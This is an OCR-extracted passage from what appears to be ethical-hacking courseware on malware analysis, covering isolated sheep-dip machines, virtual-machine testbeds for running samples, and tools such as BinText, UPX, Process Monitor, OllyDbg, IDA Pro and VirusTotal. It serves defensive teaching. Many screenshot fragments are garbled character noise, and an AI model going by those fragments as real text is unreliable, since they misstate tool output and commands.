FIGURE 7.24: Internet Worm Maker Thing
Module 07 Page 1077
o d u l e
F l o w
C E H
V ir u s a n d W o rm s C o n c e p ts
C o u n te r m e a su re s
M o d u le F lo w
M a lw are analysis is defined as the action of taking m alware separately apart for studying it. It is usually perform ed for various reasons such as for finding the v u lne ra bilitie s that are exploited for spreading the malware, the inform ation that was stolen, and prevention techniques to be taken against it from entering the system or netw ork in future.
, 4 , Virus and W o rm s Concept .'V M a lw a r e Analysis
Types o f Viruses
Counterm ea su re s
4 s
P e ne tratio n Testing
Detailed inform ation about the m alware analysis procedure is explained in the next few slides.
Module 07 Page 1078
h a t is
S h e e p
D ip
C o m p u t e r ?
C E H
(citifwd 1 tthKjl IlMkM
Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware A sheep dip computer is installed with port monitors, file monitors, network monitors and antivirus software and connects to a network only under strictly controlled conditions
Run user, group permission and process monitors
Run device driver and file monitors
Run port and network monitors
Run registry and kernel monitors
W h a t Is a S h e e p D ip C o m p u te r ?
malware. This "sheep dip p e d " c om pute r is isolated from other com puters on the netw ork to block any viruses from entering the system. Before this procedure is carried out, any dow nloaded programs are saved on external media such as CD -R O M s or flo p p y diskettes. A sheep dip com pu ter is installed with port monitors, files monitors, netw ork monitors, and antivirus softw are and connects to a netw ork only under strictly co n tro lle d conditions. A sheep dip computer: 0 0 0 0 Runs port and netw ork m onitors Runs user, group permission, and process m onitors Runs device driver and file m onitors Runs registry and kernel m onitors Sheep dipping refers to the analysis of suspect files, incom ing messages, etc. for
Module 07 Page 1079
A n ti- V ir u s
S e n s o r s
S y s t e m
C E H
B Anti-virus system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. They are used a long with sheep dip computers
Network
Anti-Virus System
a * ......
System 1 System 2 Allowed Traffic Anti-Virus Anti-Spyware
a
System 3
Anti-Trojan
Anti-Spamware
Reflected ** Traffic
Internet
Anti-Phishing
EE
Email-Scanner
A n tiv iru s S e n so r S y s te m s
An antivirus system is a collection of c om pu te r software that detects and analyzes various m alicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.
N e tw o rk A n t i- V ir u s S y s te m
.....H
System2 1
Allowed Traffic Anti Virus Anti Spyware
System1
R e flecte d T ra ffic
Allowed Traffic
U
System 3
Anti Trojan
Anti Spamware
**
R e fle cte d
* * > T ra ffic
I n te r n e t
m
Anti-Phishing Email-Scanner
FIGURE 7.25: Working of Antivirus Sensor Systems
Module 07 Page 1080
An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-Phishing, an email scanner, and so on. Usually, it is placed in between the netw ork and Internet. It allows only genuine traffic to flow through the netw ork and blocks m alicious traffic from entering. As a result, it ensures n e tw o rk security.
Module 07 Page 1081
M a lw a r e
A n a ly s is
P r o c e d u r e : C E H
Copy the malware over to the guest OS
P r e p a r in g T e s tb e d
Isolate the system from the Disable the 'shared network by ensuring that the folders', and th e'guest NIC card is in "host only" mode isolation'
f c c a
0
Install guest OS into the Virtual PC/ VMWare Install VMWare or Virtual PC on the system
M a lw a re A n a ly s is P ro c e d u re : P re p a rin g T e s tb e d
M a lw are analysis provides in-depth understanding of each individual sample and identifies em erging technical trends from the large collections of m alware samples. The samples of m alware are mostly com patible with the W in d o w s binary executable. M a lw are analysis is conducted with a variety of goals. The follow ing is the procedure for m alware analysis preparing Testbed: 0 0 0 Install V M W a r e or Virtual PC on the system Install guest OS into the Virtual P C / V M W a r e Isolate the system from the netw ork by ensuring that the NIC card is in "host only" m ode 0 0 Disable the shared folders and the guest isolation Copy the m alware over to the guest OS
Module 07 Page 1082
a l w a r e
A n a l y s i s
P r o c e d u r e
1. Perform static analysis when the malware is inactive 2. Collect information about:
0 String values found in the binary with the help of string extracting tools such as BinText e The packaging and compressing technique used with the help of compression and decompression tools such as UPX
B in T e x t
U PX
1 -1
Swxeh | F i* | Htto | P|?lOcan [C \U1tnVAdnwnfcfc1>D1klap\14up TnU>.on 0109 too T4*ia> 37310t* 0 1 1364GK|
Administrator: C:\Windows\system32\cmd.exe
D:sCEH T 00 1 3 \C E H v 8 M o d u le 07 U i r u s e s an d W o rn s s C o n p r e s s io n l\UPXNupx306#supx306t#>upx.exe U l t im a t e P a c k e r f u r e X e c u t a b le s C o p y r i if 111. <C> 1996 2011 IPX 3 .R *w M a rk u s O lie r liu m p . L a s z lo M o ln a r 0. J o h n R r I U sag e: u p x I I 2 3 4 5 6 7 * 9 d I t M il. 1 I - q o f k l -I *d -t -h -<j -o P IL k ~f -k F ile . . ly p e co n p re ss f a s t e r d e c o m p re s s t * s t c o n p r a t s i d f 11 g i v not h lp It q u l* t w r it o u tp u t t o 'P I L b ' f o r c e c o n p r o s c io n o f o u a p ic io u o { ko cp backup f i l o e x e c u t a b le s t o < de > con presa f o r n o r e d e t a i l e d h e lp . s it 1 1 t t p : / '/ u p x .3 f . 1 -0 f i l e ! P ile . . c o m p ra s s b e t t e r l i s t ro n p p n s s R d f i l e d i s p l a y u r n io n im n b d is p la y t o f t w M lie
caxxaxaxo OCCD3C000040 000030000110 A i ll 1 OCC03C000228 a ccoocaxcxc OCC030000250 AC C O O C O O C G 2 7 8 OCC03000G278 AC C O O C O O C C M f 00c03c00029f OCCC3C0013C
fb w !
iN fw 1 01 t ^ t
dau
'1 1
a;;;;;
AC O O O O O O C O ttfi 0C0030001528 /. m nviH: OC003000IA44 /. n r h i i f : OC003000IA70 A XO XO O CCE9C OC0030001A3C A3 C O O C O O C C C C 3 A .O O O O O O C C C F O 0C0030001AFO a :coocaxtfiB OC003C1001B18
H h Ik 0MZu3 Isf'rocowoiFcafuiePteiCrt KEMIE132 Gnorj | _ RcpoMM FIh ToOoM o FtoToKoop
o c c o jo o m A C S
inm
L o w n o F lw R*pcrtnaflw
*up* - - h e l p '
JPX c o n e s w i t h ABSOLUTELY NO WARRANTY; f o r
h ttp : //w w w .m c a fe e .c o m
M a lw a re A n a ly s is P ro c e d u re
Step 1: Perform static analysis w hen the m alw are is inactive Step 2: Collect inform ation about: Q Q
h tp : //u p x .s o u r c e fo r g e .n e t
Copyright by EG-Goilicil. All Rights Reserved. Reproduction is Strictly Prohibited
String values found in the binary with the help of string extracting to o ls such as BinText The packaging and com pressing te ch n iq u e used with the help of com pression and decom pression tools such as U PX
B in T e x t
Source: h ttp://w w w .m cafee.com BinText can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text, and resource strings, providing useful inform ation for each item in the optional "advanced" view mode.
Module 07 Page 1083
BinText 3.0.3
Search | Filter | Help | File (0 scan |C:MJsers\Admntstrat0(\D esktopVsetip exe Time taken: 0.109 secs Mem pos 00003000004D 000030000110 000030000228 000030000250 000030000278 00003000029F 0000300012BE 00003000150C 000030001528 000030001A44 000030001A70 000030001A9C 000030001AC8 000030001AF0 000030001818 nnnn3nm1R44 Browse
0
A u
I? Advanced view File pos 00000000004D 000000000110 000000000228 000000000250 000000000278 00000000029F 0000000006BE 00000000090C 000000000928 O O O O O O O O O E44 000000000E70 O O O O O O O O O E9C O O O O O O O O O EC 8 000000000EF0 000000000F18 a nnnnnnnnnF44 <[ III
Text size: 37340 bytes (36.46K)
A A A A A A A A A A A A A A A
I
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 n
f Text
!This program cannot be run in DOS mode RicheWl text data rsc 0re(oc 0MZu3 IsProcessorFeaturePresent KRNEL32 Genetal.AppName Genal_Reportee FtesToOelete FiesToKeep LoggmgFlags RepottngFlags llinm w . h j
Ready
AN: 1840
UN 373
RS: 0
find |
Save |
FIGURE 7.26: Bintext Screenshot
UPX
Source: h ttp ://u p x .s o u rc e fo rg e .n e t
UPX achieves an excellent c om pre ssion ratio and offers very fast decom pression . It typically compresses better than WinZip/zip/gzip.
3S
Administrator: C:\Windows\system32\cmd.exe
D:\CEH-Tools\CEHv8 Module 07 Uiruses and W orm s\Compression and Decompress l\UPX\upx308w\upx308w>upx.exe Ultimate Packer for eXecutables Copyright <C > 1996 - 2011 JPX 3.08w Markus Oberhumer, Laszlo Molnar 8 r John Reiser Dec 12th Jsage: upx [123456789dlthUL] l-qvfk] 1-0 file] f ile .. Commands: -1 compress faster -9 compress better -d decompress 1 list compressed file -t test compressed file -U display version number -h give more help -L display software license Options: -q be quiet -w be verbose - 0FILE write output to 'FILE' -f force compression of suspicious files -k keep backup files File.. executables to <de>compress rype 'upx help' for more detailed help. JPX comes with A B SO L U T E L YN OW A R R A N T Y ; for details visit http://upx.sf.ne D:\CEH-Tools\CEHv8 Module 07 Uiruses and W orm s\Compression and Decompress l\UPX\upx308w\upx308w>
FIGURE 7.27: UPX W orking in Command Prompt
Module 07 Page 1084
a l w a r e
A n a l y s i s
P r o c e d u r e (C ontd)
C E H
Urt1fw4 ilh iu l lUthM
3. Set up network connection and check that it is not giving any errors
r > n
t o
Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer
Process Monitor - Sysinternals: www.sysinternals.com

File Edit Event Filter Tools Options Help
L ilJ
Detail SyncType SyncTy Deswed Access: S Offset: 7.623.168. Offset: 7.557.632. Offset: 7.574.016.. Length 1. seqnum Length 1. startime Offset: 9.322.496. Offset: 9.547.776. Offset: 9.535.483. Offset: 7.803.392.
tf U I
Tme o f Day Process Name
]
PID Operation 2384 CreateFieMapp 2384 CloseFie CreateFie ReadFie ReadFJe ReadFie ,TCP Receive ,TCP Send ReadFie ReadFie ReadFie ReadFie Path Resut C \Wndows\System32'wnageres <* SUCCESS C \ Windows\System32N *T1agere3 dl SUCCESS C \Lbers\Admostrator\^pp Data\Local\... SUCCESS C \Window\Mcro*oft NETXFramework... SUCCESS C \Wind0 ws\Wcf0 s0 ft NETXFramework... SUCCESS C\Windows\f*crosoft.NETXFramework... SUCCESS WIN-MSSELCK4K41 1056 >WIN-MSS. SUCCESS WIN-MSSELCK4K41:1055 > WIN-MSS. SUCCESS C\Windows\Hcro soft. NETXFramevvork.. SUCCESS C XWWowsXKIcroscft NETXFramework .. SUCCESS C XWindowsXMcrosoft NETXFramework... SUCCESS CXWindowsXfAcrosoft.NETXFramework... SUCCESS
P ro cess M o n ito r
Showing 89,723 of 186,768 events (43:
. 1
Backed by virtual memory
h ttp : //te c h n e t.m ic r o s o ft.c o m

C opyright
by E&Cauactl. A ll Rights Reserved. Reproduction is S trictly Prohibited
M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t d )
Step 3: Set up n e tw o rk con nectio n and check that it is not giving any errors Step 4: Run the virus and m onitor the process actions and system inform ation with the help of process m onitoring tools such as Process M o n it o r and Process Explorer
m
l^ _
P ro c e s s M o n ito r
Source: http://technet.m icrosoft.com
Process M o n ito r is an advanced m o n ito rin g to o l for W in d o w s that shows real-time file system, registry, and p ro cess/thread activity.
Module 07 Page 1085
Process Monitor - Sysinternals: www.sysinternals.com

File Edit 0 I Event ^ P Filter & Tools I Options Help J] I , ft * I
&
Time of Day 12:13:46.620... 12:13:46.620... 12:13:46.621. .. 12:13:46.676... 12:13:46.677... 12:13:46.679... 12:13:46.685... 12:13:46 685. 12:13:46.687... 12:13:46.694... 12:13:46.695... 12:13:46.696...
n n
Process Name PID Operation Path Result Detail ExplorerEXE2384 2 k Create FileMapp. C:\Windows\System32\imageres.dllSUCCESS SyncType: SyncTy.. ^ ExplorerEXE 2384 ;rk Close File C:\W1ndows\System32\imageres.dll SUCCESS Êxplorer.EXE 2384 ; A Create File C:\Users\Administrator\AppData\Local\...SUCCESS Desired Access: S... 52mmc.exe 4100 Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 7.623.168,.. j a mmc.exe 4100 2 k Read File C:\Windows\MicrosoftNET\Framewo1k.SUCCESS Offset: 7,557,632.... Smmc.exe 4100 2 k Read File C:\Windows\Microsoft.NET\Framework. ..SUCCESS Offset: 7.574,016,.. ttfirefox.exe 2760 TCP Receive WIN-MSSELCK4K41:1056->WIN-MSS...SUCCESS Length: 1. seqnum:. (Jfirefox.exe 2760 TCP Send WIN-MSSELCK4K41:1055 >WIN-MSS...SUCCESS Length: 1. startime:.. jqjmmc.exe 4100 Read File C:\Windows\Microsoft.NEP\Framework... SUCCESS Offset: 9,322,496,.. Btmmcexe 4100 Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 9,547.776,... jgjmmc.exe 4100 2 k Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 9,535,488,.. ^m m c.exe 4100 irk Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 7,803,392...
ir i n u t __ 1 ____ 1 1 1 n >11n r
1 r r i v ___i i n n T 3 n
1r v ? c g 1r _ a g __ ! T m i i n _ _
Showing 89,723 of 186,768 events (48%)
Backed by virtual memory
FIGURE 7.28: Process Monitor Screenshot
Module 07 Page 1086
a l w a r e
A n a l y s i s
N e tR e s id e n t
( |
^ H
(rtifW d tth.ul N m Iw (
5. Record network traffic information using the connectivity and log packet content monitoring tools such as NetResident and TCPView 6. Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot
He sear* ve* Evens rods -ep AlDab | Cr04>5 * &0-p = E 1Q/V2012 S siotoefc 0 '* ffl 0 i *artyA S 0 *art* B Rdrea Fte OM j>*aJ-ess S3ve ^ Dees Event Octal =totocd ^,Web WWeb Web Web web >y,Web ^ Web ^ Web ^ Web ^ web Web Web ^W eb W teb Party A I Pot! A 1076 WM-LXQN3... VV1N-IXQN3... 1104 WIH-LXQN3... 1109 WW-IXQN3 1110 W1H-LXQN3... 1111 W 1N-LXQN3 1114 1114 W1H1XQN3... \V1N-LXCN3 1145 VV1N-IW 3N3 1147 WIN-LKQN3... 1163 W 1N-LXQN3... 1114 W1N-UQN3... 1164 W 1N4.XQN3... 1076 W1N-IXQN3 1205 5arty B mystaft-bni... m5003sM-n... maa03s&4-n... maa03s04-n... ra303s:-4*v.. m aa03e04-n1 no30 si> 4 -tv.. rnaa03st>4-n... nao03*&4-n... nas03;-4 n... m*i03*&4n... moo03*04-n... mvctrt*xU... 0&4^... Po:B 80 443 *43 *43 443 90 . 80 80 443 443 B C 80 8C 80
LastLpdated Date KV5/2012 2::. 1 :0/5/3012 2:14:3. 36 !(VS/2012 2:1.. 10/5/20122:1^:4.. :0/5/2012 2:1 10/5/2012 2:14:4. 1 36 - 10/5/2012 2:1.. 10/5/2012 2:14:4. 1 - 10/5/2012 2:1.. 10/5/2012 2:14:4.. 20 10/5/20122:1 10/5/2012 2:14:5. - 10/5/2012 2:1.. 10/5/20122:14:5.. 10/5/2012 2:1 10/5/2012 2:14:5. - 10/5/2012 2:1. 10/5/3012 2:14:5. 10/5/2012 2:1.. 10/5/2012 2:14:$.. 10/5/3012 2:1 10/5/2012 2:14:5. - 10/5/2012 2 :1 10/5/2012 2:14:5. 10*5/2012 2:1. 10/5/2012 2:15:0. - 10/5/2012 2:1 10/5/3012 3: t5:3.
rvralDH^
T O . ..
P O S 1re q u e s t t0h ttp e //n e w t400ate-a un /n cw s/xhr/rhc/M tlM M cr1 T n g V n lu 4 52777990230736.52777991632076.52777992527295.5277798-180851-1.52777983170746 527779 M394614 C M
h ttp : //w w w .ta m o s ,c o m

Step 5: Record n e tw o rk traffic in fo rm a tio n using connectivity and log packet content m onitoring tools such as N e tR e side nt and T C P V iew Step 6: D eterm ine the files added, processes spawned, and changes to the registry with the help of registry m onitoring tools such as RegShot
N e tR e sid e n t
Source: http://w w w .tam os.com
NetResident is a netw ork content analysis a pplication designed to m onitor, store, and reconstruct a w ide range of netw ork events and activities, such as email messages, w eb pages, dow nloaded files, instant messages, and VoIP conversations. It uses advanced m o n ito rin g te ch n o lo g y to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.
Module 07 Page 1087
N e t R e s i d e n t - E v a l u a ti o n V e r s io n
. n x
Fte Search View Events Tools Help AI Data |

E v e n ts
' Groups * Groups 0 0 0 ^ Dates
Refresh | y
Fiter - I Count 1 36 1 36 1 20
IP Address * | , Date u 10/5/2012 2:1... u 10/5/2012 2:1... 10/5/2012 2:1... a 10/5/2012 2: L .. 10/5/2012 2:1... a 10/5/2012 2:1... Q 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... o 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... 10/5/2012 2:1... <1
Save * ^
Delete |1 ^) Event Detail | Protocol ^ ^ ^ ^ ^ 8 ^ Web Web Web Web Web Web IH Web Web Web ^ W ^ Web Web Web Web Party A WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... Port A 1076 1104 1109 1110 1111 1114 1114 1145 1147 1163 1114 1164 1076 1205 U Party B mystarHon.1... maa03s04-n... maa03s04in... maa03s04-tn... maa03s04-in... maa03s04in... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... mystart-ton.i... maa03s04-in... Port B 80 443 443 443 443 80 80 80 443 443 80 80 80
Last Updated 10/5/2012 2:14:3.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:14:5.. 10/5/2012 2:15:0.. 10/5/2012 2:15:2..
0 S H 0 1 B
10/5/2012
Protocols Party A PartyB
0 4 * ) Web 0 2 0
I w t D d i i __________________________________________
S' ' ' ) I I I r j L^j More... *
PO ST r e q u e s t to h ttp : //n e w s .g o o g ! e .c o .in /n e w s /x h r /r h c ? a u th u s e r = 0
Tag cid
Value
52777990230736.52777991632076.52777992527295.52777984808514.52777983170746.52777984394614
J ___________________________________________________
180 bytes [ Q Connected \~ T \ 1,067,459
FIGURE 7.29: NetResident Screenshot
Module 07 Page 1088
a l w a r e
A n a l y s i s
( |
^ H
(rtifW d itbiul N m Im
7. Collect the following information using debugging tools such as OllyDbg and ProcDump: Service requests Attempts for incoming and outgoing connections DNS tables information
Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
Step 7: Collect the follow ing inform ation using debugging tools such as O llyD bg and ProcDump: Service requests A tte m pts for incom ing and outgoing connections 0
1
DNS tables inform ation
O lly D b g
Source: http://w ww .ollydbg.de
OllyDbg is a 32-bit assem bler-level analyzing debugger for M icrosoft W in d o w s Emphasis on binary code analysis makes it particularly useful in cases w here source is unavailable.
Module 07 Page 1089
OllyDbg OLLYDBG.EXE - (CPU main thread, module OLLYDBG]

C] Fik
V k*
Debug
Plugins no.
Options
Window
Hdp
L k l]
gMsL ! W 4 0 l0 \<
0O 4O 109A
E C X .9 C PU SH E C X 3 l L J ^ P . (K E R N E L 3 2 . G t t P r 0 c s 1 M t 4 0 >
.E ? 0 . 8 ? 2 E 0 0 A 8 0 . 0 0 0 0 I1 Z . v7s O A F O 0 O O O 0 O 6 8. . J E 8 B 6 F F F F F F S O > . 6 0 . F F 3 S 1 0 0 1 4 0 0 0 0 0 4 O 1 O 8 S. E O I1 C 3 O O 0 0 .E F F 3 S 1 B 0 1 4 & 0 0 . 8 lA c lo S S e SF < ? .0 6 9 9 0 0 0 0 0 0 0 . 8 C ? .~ 7 4 1 9 . E 8 C E C 2 O A 0 O 33 .*300 1 0 0 1 4 6 0 0 C ooêiooc A V P . 8 .* 7 3 9 1 . F C 0 0 O 8 0 0 8 8 . E 8 7 A F F F F F F C 3 > < t 0 3 3 0 \m\um .F 7 2 2 1 . F 3 5 B O 1 4 B 0 O 8e o IS o w O o 1 0 2 .E 1

0 0 4 0 1 0A2 O 04 0 10 A 3 004010A6 004010AA 0O4C1OAC 00401061 00401066 00401087 0O4O1O8E O 04O IO C3 0o4e18c9 0 04 O 10 C E 004e1dCF 00401000 004O1OOS 00-* e 100 7 00401009 0e*e1ec3 004e10E6 0 0 4 0 1 8 8 0O 4 0 10 E D O 0401O F2 0 04 0 1 O F3 0 0 4 0 1 OFA 0 0 4 0 10FC 1 107 0 O 4O 1109 00401108 0 0 4 0 1 IOC 0040110C 00401U 3
vm
jMnw
h a mmam
C c u . <JM P . ( K E R N E L 3 2 . H c A 1 lo> OP E A X .E A X SHORT O L L Y O 0 6 .0 0 4 0 1 0 0 6 nou e a x . o fo C A L L O L L V O 6 6 .0 O 4 0 1 0 6 C PU SH E A X PU SH E A X PU SH DUORO PT R OS* 14001 ISO C A L L 0 L L V 0 8 G .0 0 4 0 0 3 0 4 PUSH DMORO PT R O S t (4 0 0 1 1 0 3 C A L L O L L V O 0 O .0 0 4 A 0 3 E 8 POP E01 RETN W J E C X .9 C OR E C X .E C X J E SHORT O LLV O CC. 0 0 4 0 1 0 P 2 C A L L O LL V 0 8G .0 O 4 A O 3 A C flOL OUOPO PT R O S; [ 4 0 0 1 1 0 3 . E A X E A X .0 JN B SHORT 0 L L V D 8 & .0 0 4 0 1 0 7 9 0U E A X .0 F C C A L L O L L V 0 8 G .0 0 4 0 1 06C RETN C P OMORO P T R O S* [ 4 0 0 1 1 0 3 . 0 J SHORT X L V 0 6 6 . 0 0 4 0 1 124 PUSH [*O RO PT R OS: [4 0 0 1 1 6 3 C A L L Q LL V 0 6 G .0 0 4 H 0 3 C 4 OR E A X .E A X JE SHORT 0 L L V 0 8 G . 0 0 4 0 1 1 2 4 PU SH E A X PU SH 0 C A L L < J H P .(K E R N E L 3 2 . G ttP r o c f tf t H c PU SH ER X C A L L <J M P .t :E K H E L 3 2 .H * c f >
[
r
H440S1Z s> X
f iw
C G t P r o e * t H 4e
: M EPP_iER0_r^nd
(1 5 6 .1 .
j __
ECX oooooooo
COX 0 M 9 I 0 M OLL'.CGO.<rvcxdw l E r t r y P o in t > E B X 7FA9O0OO ESP 0 0 1 8 FF 8 8
kltoao
H t a o A lt o e
El0 0 4 0 1 0 8 i X L V t 1 . < n 0 0 u lt o t f v P o i f t >
IA ral =0 0 0 0 0 0 0 0
O LLV T O G . 0 04 A 0 3O 4
ES CS SS OS FS GS
0026 0023 0026 0028 00*3 0020
32b i t 3 2 b lt 32b I t 3 2 b it 3 2 b it 3 2 b it
0( F F F F F F F F O CFFFFFFFFI 9( F F F F F F F F I 0 (F F F F F FF F 1 7FO 9 C00 0 ( F F F l 0 (FFFFFFFF)
L ttE rr ST0 STl ST2 ST3 ST4 STS n o ty n o ty *ty n ty n 0 ty tfv ty 0 .0 0 .0 0 .0 0 .0 0 .0 0 .0
EftftOR_ttCO_NOT_FOUNO <000000?E>
E F . 00000244 N 0 .f .E .B .N S .P .G E .L E i
LO U .V O 0 6 .0 O 4 A O 3 C 4
3 2 1 0 C oftd 0 0 0 0 P*< N E A P ,S 3
Err
r1 * * k 11 11 1t
E S P U 0 Z 0 I 0 0 0 0 0 0 0 0
F 1 * t = > C A P_ 2 E R 0 _ rC n C C G ttP ro c tttH tte I l>Htp
rc-:! >
I****"
RETURN t o
O 01 8 FF 0 C
FIGURE 7.30: OllyDbg Screenshot
Module 07 Page 1090
Ethical Hacking and Countermeasures Copyright by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
V i r u s
A n a l y s i s T o o l: ID A
P r o
C E H
U rt> fW 4 ttfciul N m Im
h ttp : //w w w .h e x r a y s .c o m
Copyright by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited.
V iru s A n a ly s is T o o l: ID A P ro
Source: http://www.hex-rays.com This is a dissem bler and debugger tool that supports both W in d o w s and Linux platforms.
D isse m b le r
The dissem bler displays the instruction execution of various programs in symbolic form, even if the code is available in a binary form. It displays the instruction execution of the processor in the form of maps. It enables its users to identify viruses as well. For example, if any screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro Tool reveals this immediately. IDA Pro is developed with the latest techniques that enable it to trace difficult binary codes. These are displayed in readable execution maps.
D ebugger
The debugger is an interactive tool that com plem ents the dissem bler to perform the task of static analysis in one single step. It bypasses the obfuscation process, which helps the assem bler to process the hostile code in-depth.
Module 07 Page 1091
IDA Pro is a tool that allows you to explore any software interruptions and vulnerabilities and to use it as tam pe r resistance. It is an interactive, programmable, m ulti-processor disassembler coupled to a local and rem ote debugger and augmented by a com plete plugin programm ing environment. This can also be used to protect your essential privacy rights. This is used by antivirus companies, research companies, software de ve lopm e nt companies, agencies, and military organizations.
IDA - C:\Program Files (x86)\IDA Demo 6.3\qwingraph.exe
File Edit Jump Search View Debuggei Options Windows Help
~ I I * B
111
171 Finctxms wndow Function name sub_401070 sub.401200 sub.401230 sub_4012F0 sub_4O13A0 sub.4015A0 sub_402EA0 $ub.402EC0 sub_403140 sub_403330 sub.403500 sub.403680 sub.403900 sub.403920 j IDA View-A Q | | g ] Hex View-A | ft] Structures I QS Enure_____ | 1*5 Iniports
fa! r _____ 1 : ! --------- Z 3

[ j* Exports
Line 2 of 944
[g *O u tp u tw n d o w
C om piling file 'C :\Program Files (x86)\ID AD e m o 6.3\idc\ida.idc'... Executing function Min. . . Coapiling file *C :\P rogran1 Files (x8>\ID AD e sa 6.3\idc\onload. idc'... executing function 'O n L oad ' ID Aia analysing the input file... Y o um a y start to explore the input file right n ow . U sing F L IR T signature: M icrosoft V isualC 2-10/net runt
1
sub.403960 sub_403A40 sub 403B30
u a r_ C = d w o rd p t r -OCh u a r_ 8 = d u o rd p t r -8 o a r ^ ' d w o rd p t r -<* h In s ta n c e - d u o rd p t r < 1 h P r e u I n s t a n c e - d w o rd p t r lp C n d L in e - d u o r d p t r OCh n S h o w C n d- d w o rd p t r 10h e s p , 18h e a x , [ e s p 1 8 h u a r _ 1 i] eax OFFFFFFFFh d s :G e tC o n n a n d L in e W eax e c x , [e s p Z < ih u a r_ 1 0 ] ecx d s :? fro n W C h a rftrra y 0 Q S trin g 0 Q T B B S fl? ftU 1 2 0 P B G H 0 2 ; QT: : Q S t r i n g : : F r o m W C h a r A r r a y ( u s h o r t c o n s t e s p , OCh e c x , eax d s :? to L o c a l8 B itB Q S trin g 6 Q T B B Q B E ? A U Q B y te A rra y Q 2 Q X Z ; Q T: : Q S t r i n g : : t o L o c a l 8 B i t ( u o i d ) e d x , [e s p * 1 8 h * u a r_ 1 0 ]
su b le a push push c a ll push le a push c a ll add mou c a ll Irnou
100.00* (-141,105) (509,26) 0 0 0 4 1 3 5 70 0 4 4 1 F 5 7 : inM 4in(x,x,x,x)+ 27
nrcccccccH
Module 07 Page 1092
O n lin e M a lw a r e T e s tin g : V iru s T o ta l " T j|
::
r V E H
tttK 4l IU (h M
M VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of viruses, worms, Trojans, etc.
3 Antfwus ia n for fbili C 1 ft Itips: 'vk'^w.virustotaLconn ' e/C5'5'd625c39d3d5d9l041b9720a30c2fb1e757e603695d3478687c27c392fdt.an.aly$s^Statistics DocantflUlidn FAQ About Join our community Sign =
Community
m
1
&
i r u
total *K
0 ^ 0
SHA2&6
06131d62$c?9dMM91W1W720a30c2ti176796C3695<J3478687c27c392Wb smoa_O6131<l62Sc3*i3dS<*91(Ult072Oa3Cc2lb1e757e6O369S<m78687c27c392Wb bin OM Ctfa
&
r i r u ! t o
M u m m l!* (* *1 2 V B
File name ,,,,,
J 0 |M 7.17 02 5200 l/TC }2 . )
hi 2 , . . . n V
Antlvliuc AhnLab-V3 AntiVif Antiy-AVL
Kutulf WifiTrojarvMMueker 1036288 BOCWm m x m 23 G1 Bac*(*oorW1n.32 MoSuckei gen Win32 Tro!an-gen Bac Coor Mmuc kw
Update 20120716 20120716 20120717 20120716 20120716
h ttp : //w w w .v ir u s to ta l.c o m
Avast AVG
.Ccipyright by EC-C0MCi. A ll Rights Rese rv e C Reproduction is S tric tly Prohibited.
|p 5 |
O n lin e M a lw a re T e s tin g : V iru s T o ta l

Sour ce: http://w ww .virustotal.com
VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of m a lw a re de tected by antivirus engines. Features: 0 0 0 0 0 Free and independent service Uses multiple antivirus engines Com prised of real-time autom atic updates of virus signatures Gives detailed results from each antivirus engine Has real-time global statistics
Module 07 Page 1093
- <
C i *P ^0 ^ 0 //0 6 (>5 > > > 1 > 1 < 4 9 7 ;0 0 }^(^7 * ( > 1 4 7 6 *7 > 2 7 )/%^0
3 /iru! t o t a l
S! /iru s to ta l
MwnumMtwt 3JMB
^ **
JT.4I J*V-0MrM00lTC(?rcm* lw ktt90)
*N * 0 0
'.Vinrre aaMdm ic 2 8 8 )103 OOCMotutM 2 Ol mfray snt*t tok * i a URL or starch thrtugh th* /ruTc d Bacl1ioor> W n32 MoSucktf g v<
W W 2T r 0 |J0 9 * n
BactOooi M1ucM
FIGURE 7.32: virustotal Screenshot
Module 07 Page 1094
O n lin e
M a lw a r e A n a ly s is
,
ltfc.nl M m hat
C p VI T YT X l /tp Q f j ^ v T O
Anubis: Analyzing Unknown Binaries

h ttp ://a nu b is. is eclab. org
Metascan Online
h ttp ://w w w . metascan-online, com
Avast! Online Scanner

http://onlinescan. avas t. com
Bitdefender QuickScan
h ttp ://w w w . bitdefender. com
Malware Protection Center

h ttps://w w w .m icrosoft.com
GFI SandBox
h ttp ://w w w . gfi. com
> ___ j
ThreatExpert
h ttp ://w w w . threatexpert.com
UploadMalware.com
h ttp ://w w w . uploadmalware. com
Dr. Web Online Scanners

h ttp ://v m s . dr web. com
Fortinet
h ttp ://w w w .fo rtig u ard . com
O n lin e M a lw a re A n a ly s is S e rv ic e s
